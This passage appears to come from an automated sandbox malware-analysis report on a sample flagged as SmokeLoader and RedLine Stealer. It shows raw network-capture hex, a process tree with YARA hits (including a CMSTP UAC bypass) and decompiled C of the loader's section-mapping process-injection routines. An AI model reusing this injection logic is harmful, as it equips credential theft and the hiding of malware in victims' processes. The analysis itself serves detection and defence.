                    2022-11-24 19:13:26 UTC496INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 03 00 00 00 30 00 00 80 09 00 00 00 68 00 00 80 0e 00 00 00 80 00 00 80 10 00 00 00 98 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 01 00 00 00 b0 00 00 80 02 00 00 00 c8 00 00 80 03 00 00 00 e0 00 00 80 04 00 00 00 f8 00 00 80 05 00 00 00 10 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 bf 00 00 00 28 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 81 00 00 00 40 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 58 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 17
                    Data Ascii: 20000h(@X
                    2022-11-24 19:13:26 UTC504INData Raw: bd 35 37 80 9a b3
                    Data Ascii: 57
                    2022-11-24 19:13:26 UTC504INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC504INData Raw: 31 30 33 38 0d 0a 47 7d 85 82 81 83 80 46 86 cb cb 37 85 cd be 3c 81 d1 c7 3b 87 cb c1 43 8f cc c3 40 83 c4 d1 3d 81 cd cc 36 7d ce c8 46 58 80 83 6d 38 84 a0 82 37 69 7f 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 83 d1 d2 3c 83 c8 d2 38 84 c6 c2 2e 35 82 96 a3 83 7f ba d3 4c 7d 97 c2 3d 84 82 80 7a 92 91 4a 83 ca cc 3e 82 c5 ca 46 82 ca cf 43 7d c2 c1 40 51 82 7f 5b 3b 80 94 85 5c 83 a4 ca 71 83 a4 cb 34 71 7e 84 80 cb c1 37 7e c7 cd 44 85 ca d2 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e d6 cb 3c 8a be d5 32 81 c5 d9 42 3a 85 8e 80 82 af ca c9 7e b2 b6 ca 7d 7c ae ce 3a 7a 9c a5 47 7f 83 83 8e ca ca 33 41 73 83 5a 42 85 a3 7f 50 7b 9d cd 7c 8f be c8 7c a9 c2 b7 6e 81 aa c6 47 70 7b 6e 85 bc d3 3b 00
                    Data Ascii: 1038G}F7<;C@=6}FXm87i|<8.5L}=zJ>FC}@Q[;\q4q~7~D5~<2B:~}|:zG3AsZBP{||nGp{n;


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:20:12:03
                    Start date:24/11/2022
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\file.exe
                    Imagebase:0x400000
                    File size:192000 bytes
                    MD5 hash:44C87D3BC316EEFE4DCBF66AFED72ABC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.389150563.00000000007D9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    Reputation:low

                    Target ID:1
                    Start time:20:12:11
                    Start date:24/11/2022
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff618f60000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high

                    Target ID:4
                    Start time:20:13:01
                    Start date:24/11/2022
                    Path:C:\Users\user\AppData\Roaming\gfgsrbs
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\gfgsrbs
                    Imagebase:0x400000
                    File size:192000 bytes
                    MD5 hash:44C87D3BC316EEFE4DCBF66AFED72ABC
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.439838809.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.439756296.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    Target ID:5
                    Start time:20:13:12
                    Start date:24/11/2022
                    Path:C:\Users\user\AppData\Local\Temp\B87E.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\B87E.exe
                    Imagebase:0x400000
                    File size:1041408 bytes
                    MD5 hash:1BD9FB4ADE498938E6432D6C5D1E23A5
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.465675334.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.464999094.00000000023E8000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    Target ID:6
                    Start time:20:13:19
                    Start date:24/11/2022
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp",Worhdhqfpryr
                    Imagebase:0x2a0000
                    File size:61952 bytes
                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:7
                    Start time:20:13:25
                    Start date:24/11/2022
                    Path:C:\Users\user\AppData\Local\Temp\EBC4.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\EBC4.exe
                    Imagebase:0x400000
                    File size:520192 bytes
                    MD5 hash:F06F222962C48BB7D822AC0FCD14CFD2
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.490026544.00000000007D8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.489025318.0000000000413000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.491094489.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    Target ID:12
                    Start time:20:13:30
                    Start date:24/11/2022
                    Path:C:\Users\user\AppData\Local\Temp\EBC4.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\EBC4.exe"
                    Imagebase:0x400000
                    File size:520192 bytes
                    MD5 hash:F06F222962C48BB7D822AC0FCD14CFD2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.507752658.0000000000413000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.508127719.00000000008EF000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000C.00000002.507936958.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    Reputation:low

                      Execution Graph

                      Execution Coverage:4.4%
                      Dynamic/Decrypted Code Coverage:19.9%
                      Signature Coverage:11.9%
                      Total number of Nodes:538
                      Total number of Limit Nodes:13

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      [Control-flow graph of the function starting at 4013d8; edge list omitted. API call nodes: NtDuplicateObject, NtCreateSection, NtMapViewOfSection.]
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0770cd10f47575dba946c72a205b39b8d4daa6ec592c66899ecf253aeda9c0e3
                      • Instruction ID: 67db8dc375151bfe257540867c3d287c712409260c0918a2d7cc4bffad82e0fd
                      • Opcode Fuzzy Hash: 0770cd10f47575dba946c72a205b39b8d4daa6ec592c66899ecf253aeda9c0e3
                      • Instruction Fuzzy Hash: 22912472600204ABDB219FA1CC44EEF7BB8EF81B14F10467AFA12BB1F5D6759905CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      [Control-flow graph of the function starting at 4014a8; edge list omitted. API call nodes: NtDuplicateObject, NtCreateSection, NtMapViewOfSection.]
                      C-Code - Quality: 59%
                      			E004014A8(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                      				char _v8;
                      				long _v12;
                      				void* _v16;
                      				void* _v20;
                      				char _v44;
                      				char _v52;
                      				long _v56;
                      				long _v60;
                      				char _v64;
                      				char _v68;
                      				char _v72;
                      				char _v76;
                      				char _v84;
                      				char _v88;
                      				char _v92;
                      				intOrPtr _v96;
                      				char _v100;
                      				void* __ebx;
                      				void* __edi;
                      				void* __ebp;
                      				void* _t84;
                      				intOrPtr _t87;
                      				long _t90;
                      				void* _t91;
                      				struct _GUID _t98;
                      				struct _GUID _t100;
                      				PVOID* _t102;
                      				PVOID* _t104;
                      				intOrPtr _t106;
                      				intOrPtr* _t108;
                      				PVOID* _t121;
                      				PVOID* _t123;
                      				intOrPtr _t127;
                      				intOrPtr _t128;
                      				intOrPtr _t129;
                      				long* _t130;
                      				signed int _t137;
                      				int _t138;
                      				signed int _t157;
                      				signed int _t158;
                      				signed int _t159;
                      				void* _t160;
                      				intOrPtr* _t161;
                      				void* _t164;
                      				void* _t171;
                      				long _t172;
                      				intOrPtr _t173;
                      				void* _t174;
                      				long* _t180;
                      				intOrPtr* _t181;
                      				HANDLE* _t182;
                      				HANDLE* _t183;
                      				void* _t188;
                      				void* _t189;
                      				intOrPtr* _t192;
                      				void* _t193;
                      				intOrPtr _t196;
                      				intOrPtr* _t197;
                      				intOrPtr* _t198;
                      				void* _t200;
                      				intOrPtr* _t201;
                      				void* _t202;
                      				long _t217;
                      
                      				_t84 = 0x14e3;
                      				_push(0x37f);
                      				_t128 =  *_t197;
                      				_t198 = _t197 + 4;
                      				L0040119E(_t84, _t128, _t171, __eflags);
                      				_t127 = _a4;
                      				_t172 = 0;
                      				_v56 = 0;
                      				if(gs != 0) {
                      					_v56 = _v56 + 1;
                      				}
                      				while(1) {
                      					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
                      					if(_t87 != 0) {
                      						break;
                      					}
                      					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
                      				}
                      				_v96 = _t87;
                      				_t180 =  &_v100;
                      				 *_t180 = _t172;
                      				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t180);
                      				_t90 =  *_t180;
                      				if(_t90 != 0) {
                      					_t130 =  &_v52;
                      					 *_t130 = _t90;
                      					_t130[1] = _t172;
                      					_t181 =  &_v44;
                      					 *((intOrPtr*)(_t127 + 0x10))(_t181, 0x18);
                      					 *_t181 = 0x18;
                      					_push( &_v52);
                      					_push(_t181);
                      					_push(0x40);
                      					_push( &_v20);
                      					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t172, _t172, 2) == 0) {
                      						_v12 = _t172;
                      						_t98 =  &_v84;
                      						 *(_t98 + 4) = _t172;
                      						 *_t98 = 0x5000;
                      						_t182 =  &_v88;
                      						if(NtCreateSection(_t182, 6, _t172, _t98, 4, 0x8000000, _t172) == 0) {
                      							_push(_v84);
                      							_pop( *_t25);
                      							_t121 =  &_v72;
                      							 *_t121 = _t172;
                      							if(NtMapViewOfSection( *_t182, 0xffffffff, _t121, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
                      								_t123 =  &_v64;
                      								 *_t123 = _t172;
                      								if(NtMapViewOfSection( *_t182, _v16, _t123, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
                      									_t196 = _v72;
                      									 *((intOrPtr*)(_t127 + 0x20))(_t172, _t196, 0x104);
                      									 *((intOrPtr*)(_t196 + 0x208)) = _a16;
                      									_v12 = _v12 + 1;
                      								}
                      							}
                      						}
                      						_t100 =  &_v84;
                      						 *(_t100 + 4) = _t172;
                      						 *_t100 = _a12 + 0x10000;
                      						_t183 =  &_v92;
                      						if(NtCreateSection(_t183, 0xe, _t172, _t100, 0x40, 0x8000000, _t172) == 0 && _v12 != 0) {
                      							_push(_v84);
                      							_pop( *_t46);
                      							_t102 =  &_v76;
                      							 *_t102 = _t172;
                      							if(NtMapViewOfSection( *_t183, 0xffffffff, _t102, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
                      								_t104 =  &_v68;
                      								 *_t104 = _t172;
                      								_t217 = NtMapViewOfSection( *_t183, _v16, _t104, _t172, _t172, _t172,  &_v60, 1, _t172, 0x20);
                      								if(_t217 == 0) {
                      									L21();
                      									if(_t217 == 0 && _t217 != 0) {
                      									}
                      									_t200 = _t198 + 4;
                      									_push(0x2e62);
                      									_t201 = _t200 + 4;
                      									_push(0x2260);
                      									_t106 =  *_t201;
                      									_t202 = _t201 + 4;
                      									_t157 = (0x2260 << 5) + _t106;
                      									asm("lodsb");
                      									_t158 = _t157;
                      									asm("loop 0xffffffc2");
                      									_t159 = _t158 ^ 0xbcc951dd;
                      									_t198 = _t202 - _t159;
                      									_t188 = _a8 +  *_a8;
                      									_t137 =  *(_t188 + 6) & 0x0000ffff;
                      									_push(_t188);
                      									_t160 = _t188;
                      									if(_v56 == 0) {
                      										_t161 = _t160 + 0xf8;
                      										__eflags = _t161;
                      									} else {
                      										_t161 = _t160 + 0x108;
                      									}
                      									_push(_t137);
                      									_t138 =  *(_t161 + 0x10);
                      									if(_t138 != 0) {
                      										memcpy( *((intOrPtr*)(_t161 + 0xc)) + _v76,  *((intOrPtr*)(_t161 + 0x14)) + _a8, _t138);
                      										_t198 = _t198 + 0xc;
                      									}
                      									asm("loop 0xffffffe6");
                      									_pop(_t189);
                      									_t222 = _v56;
                      									if(_v56 == 0) {
                      										_push(_t189);
                      										_t164 =  *((intOrPtr*)(_t189 + 0x34)) - _v68;
                      										_t192 =  *((intOrPtr*)(_t189 + 0xa0)) + _v76;
                      										__eflags = _t192;
                      										while(1) {
                      											__eflags =  *_t192;
                      											if( *_t192 == 0) {
                      												break;
                      											}
                      											_t173 =  *_t192;
                      											_t192 = _t192 + 8;
                      											asm("lodsw");
                      											__eflags = 0;
                      											if(0 != 0) {
                      												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t164;
                      												__eflags =  *((intOrPtr*)(0 + _v76 + _t173));
                      											}
                      											asm("loop 0xffffffe9");
                      										}
                      										_pop(_t193);
                      										_t172 = 0;
                      										__eflags = 0;
                      										_t108 =  &_v8;
                      										 *_t108 = 0;
                      										 *((intOrPtr*)(_t127 + 0x98))(_v16, 0, 0, 0, 0, 0,  *((intOrPtr*)(_t193 + 0x28)) + _v68, _v64, _t108, 0);
                      									} else {
                      										L54();
                      										_pop(_t174);
                      										_t172 = _t174 - 0x1760;
                      										 *((intOrPtr*)(_t172 + 0x1794)) = _t172 + 0x2c17;
                      										L00401227(_t127, _t172, _t222, _t172 + 0x2c17, 0x1ad);
                      										0x33();
                      										 *((intOrPtr*)(_t172 + 0x17b9)) = _t172 + 0x2c67;
                      										0x33();
                      									}
                      								}
                      							}
                      						}
                      					}
                      				}
                      				_t91 = 0x14e3;
                      				_push(0x37f);
                      				_t129 =  *_t198;
                      				return L0040119E(_t91, _t129, _t172, _t222);
                      			}

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: 2cfc8301c030803b858046a898f5dfafd46e7c9465d39b5d003f99b680b42ab3
                      • Instruction ID: cd3d7ef155730ff18c04e90283d35d9337f0c2e1175127a0e4488d23b7b2eda1
                      • Opcode Fuzzy Hash: 2cfc8301c030803b858046a898f5dfafd46e7c9465d39b5d003f99b680b42ab3
                      • Instruction Fuzzy Hash: B6511871900249BBEB219F91CC48FEBBBB9EF85B10F104129FA11BA2E5D7749941CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      [Control-flow graph of the function starting at 4014b3; edge list omitted. API call nodes: NtDuplicateObject, NtCreateSection, NtMapViewOfSection.]
                      C-Code - Quality: 63%
                      			E004014B3(void* __ebx, void* __edi, void* __eflags) {
                      				void* _t84;
                      				intOrPtr _t87;
                      				long _t90;
                      				void* _t91;
                      				struct _GUID _t98;
                      				struct _GUID _t100;
                      				PVOID* _t102;
                      				PVOID* _t104;
                      				intOrPtr _t106;
                      				intOrPtr* _t108;
                      				PVOID* _t121;
                      				PVOID* _t123;
                      				intOrPtr _t128;
                      				intOrPtr _t130;
                      				intOrPtr _t131;
                      				long* _t132;
                      				signed int _t139;
                      				int _t140;
                      				signed int _t161;
                      				signed int _t162;
                      				signed int _t163;
                      				void* _t164;
                      				intOrPtr* _t165;
                      				void* _t168;
                      				long _t176;
                      				intOrPtr _t178;
                      				void* _t179;
                      				long* _t185;
                      				intOrPtr* _t187;
                      				HANDLE* _t188;
                      				HANDLE* _t189;
                      				void* _t194;
                      				void* _t195;
                      				intOrPtr* _t198;
                      				void* _t199;
                      				void* _t202;
                      				void* _t203;
                      				void* _t205;
                      				intOrPtr* _t206;
                      				intOrPtr* _t207;
                      				void* _t210;
                      				intOrPtr* _t211;
                      				void* _t212;
                      				long _t227;
                      
                      				_t206 = _t205 + 1;
                      				_t84 = 0x14e3;
                      				_push(0x37f);
                      				_t130 =  *_t206;
                      				_t207 = _t206 + 4;
                      				L0040119E(_t84, _t130, __edi, __eflags);
                      				_t128 =  *((intOrPtr*)(_t203 + 8));
                      				_t176 = 0;
                      				 *((intOrPtr*)(_t203 - 0x34)) = 0;
                      				if(gs != 0) {
                      					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
                      				}
                      				while(1) {
                      					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
                      					if(_t87 != 0) {
                      						break;
                      					}
                      					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                      				}
                      				 *((intOrPtr*)(_t203 - 0x5c)) = _t87;
                      				_t185 = _t203 - 0x60;
                      				 *_t185 = _t176;
                      				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t185);
                      				_t90 =  *_t185;
                      				if(_t90 != 0) {
                      					_t132 = _t203 - 0x30;
                      					 *_t132 = _t90;
                      					_t132[1] = _t176;
                      					_t187 = _t203 - 0x28;
                      					 *((intOrPtr*)(_t128 + 0x10))(_t187, 0x18);
                      					 *_t187 = 0x18;
                      					_push(_t203 - 0x30);
                      					_push(_t187);
                      					_push(0x40);
                      					_push(_t203 - 0x10);
                      					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t176, _t176, 2) == 0) {
                      						 *(_t203 - 8) = _t176;
                      						_t98 = _t203 - 0x50;
                      						 *(_t98 + 4) = _t176;
                      						 *_t98 = 0x5000;
                      						_t188 = _t203 - 0x54;
                      						if(NtCreateSection(_t188, 6, _t176, _t98, 4, 0x8000000, _t176) == 0) {
                      							 *_t25 =  *(_t203 - 0x50);
                      							_t121 = _t203 - 0x44;
                      							 *_t121 = _t176;
                      							if(NtMapViewOfSection( *_t188, 0xffffffff, _t121, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
                      								_t123 = _t203 - 0x3c;
                      								 *_t123 = _t176;
                      								if(NtMapViewOfSection( *_t188,  *(_t203 - 0xc), _t123, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
                      									_t202 =  *(_t203 - 0x44);
                      									 *((intOrPtr*)(_t128 + 0x20))(_t176, _t202, 0x104);
                      									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
                      									 *(_t203 - 8) =  *(_t203 - 8) + 1;
                      								}
                      							}
                      						}
                      						_t100 = _t203 - 0x50;
                      						 *(_t100 + 4) = _t176;
                      						 *_t100 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
                      						_t189 = _t203 - 0x58;
                      						if(NtCreateSection(_t189, 0xe, _t176, _t100, 0x40, 0x8000000, _t176) == 0 &&  *(_t203 - 8) != 0) {
                      							 *_t46 =  *(_t203 - 0x50);
                      							_t102 = _t203 - 0x48;
                      							 *_t102 = _t176;
                      							if(NtMapViewOfSection( *_t189, 0xffffffff, _t102, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
                      								_t104 = _t203 - 0x40;
                      								 *_t104 = _t176;
                      								_t227 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t104, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 0x20);
                      								if(_t227 == 0) {
                      									L20();
                      									if(_t227 == 0 && _t227 != 0) {
                      									}
                      									_t210 = _t207 + 4;
                      									_push(0x2e62);
                      									_t211 = _t210 + 4;
                      									_push(0x2260);
                      									_t106 =  *_t211;
                      									_t212 = _t211 + 4;
                      									_t161 = (0x2260 << 5) + _t106;
                      									asm("lodsb");
                      									_t162 = _t161;
                      									asm("loop 0xffffffc2");
                      									_t163 = _t162 ^ 0xbcc951dd;
                      									_t207 = _t212 - _t163;
                      									_t194 =  *((intOrPtr*)(_t203 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0xc))));
                      									_t139 =  *(_t194 + 6) & 0x0000ffff;
                      									_push(_t194);
                      									_t164 = _t194;
                      									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                      										_t165 = _t164 + 0xf8;
                      										__eflags = _t165;
                      									} else {
                      										_t165 = _t164 + 0x108;
                      									}
                      									_push(_t139);
                      									_t140 =  *(_t165 + 0x10);
                      									if(_t140 != 0) {
                      										memcpy( *((intOrPtr*)(_t165 + 0xc)) +  *(_t203 - 0x48),  *((intOrPtr*)(_t165 + 0x14)) +  *((intOrPtr*)(_t203 + 0xc)), _t140);
                      										_t207 = _t207 + 0xc;
                      									}
                      									asm("loop 0xffffffe6");
                      									_pop(_t195);
                      									_t232 =  *((intOrPtr*)(_t203 - 0x34));
                      									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                      										_push(_t195);
                      										_t168 =  *((intOrPtr*)(_t195 + 0x34)) -  *(_t203 - 0x40);
                      										_t198 =  *((intOrPtr*)(_t195 + 0xa0)) +  *(_t203 - 0x48);
                      										__eflags = _t198;
                      										while(1) {
                      											__eflags =  *_t198;
                      											if( *_t198 == 0) {
                      												break;
                      											}
                      											_t178 =  *_t198;
                      											_t198 = _t198 + 8;
                      											asm("lodsw");
                      											__eflags = 0;
                      											if(0 != 0) {
                      												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t168;
                      												__eflags =  *((intOrPtr*)(0 +  *(_t203 - 0x48) + _t178));
                      											}
                      											asm("loop 0xffffffe9");
                      										}
                      										_pop(_t199);
                      										_t176 = 0;
                      										__eflags = 0;
                      										_t108 = _t203 - 4;
                      										 *_t108 = 0;
                      										 *((intOrPtr*)(_t128 + 0x98))( *(_t203 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t199 + 0x28)) +  *(_t203 - 0x40),  *(_t203 - 0x3c), _t108, 0);
                      									} else {
                      										L53();
                      										_pop(_t179);
                      										_t176 = _t179 - 0x1760;
                      										 *((intOrPtr*)(_t176 + 0x1794)) = _t176 + 0x2c17;
                      										L00401227(_t128, _t176, _t232, _t176 + 0x2c17, 0x1ad);
                      										0x33();
                      										 *((intOrPtr*)(_t176 + 0x17b9)) = _t176 + 0x2c67;
                      										0x33();
                      									}
                      								}
                      							}
                      						}
                      					}
                      				}
                      				_t91 = 0x14e3;
                      				_push(0x37f);
                      				_t131 =  *_t207;
                      				return L0040119E(_t91, _t131, _t176, _t232);
                      			}

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: 6e59b7e5303ef17d3f4c775c21a888ce17b01420e14e5236be6b7b92dd2dae58
                      • Instruction ID: 39cbb5cf0de6fd42451f7104dd6b59036266353996c087b5e70b14ffae25b97f
